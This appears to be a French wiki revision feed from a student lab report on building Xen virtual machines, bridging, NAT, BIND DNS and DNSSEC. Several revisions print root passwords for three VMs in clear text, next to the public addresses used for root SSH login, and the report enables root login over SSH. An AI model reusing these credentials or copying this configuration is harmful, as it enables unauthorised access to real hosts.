<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:DNSSec.png&diff=11981
Fichier:DNSSec.png
2026-02-01T23:04:34Z
<p>Cpayet : </p>
<hr />
<div>DNSSec</div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Fichier:DNS_Check.png&diff=11980
Fichier:DNS Check.png
2026-02-01T22:19:30Z
<p>Cpayet : </p>
<hr />
<div>DNS Check</div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11522
Atelier SysRes SE4 2025/2026 E5
2026-01-27T17:13:57Z
<p>Cpayet : /* DNS */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11514
Atelier SysRes SE4 2025/2026 E5
2026-01-27T15:41:10Z
<p>Cpayet : /* DNS */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=11513
Atelier SysRes SE4 2025/2026 E5
2026-01-27T15:37:32Z
<p>Cpayet : /* Nos résultats : */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
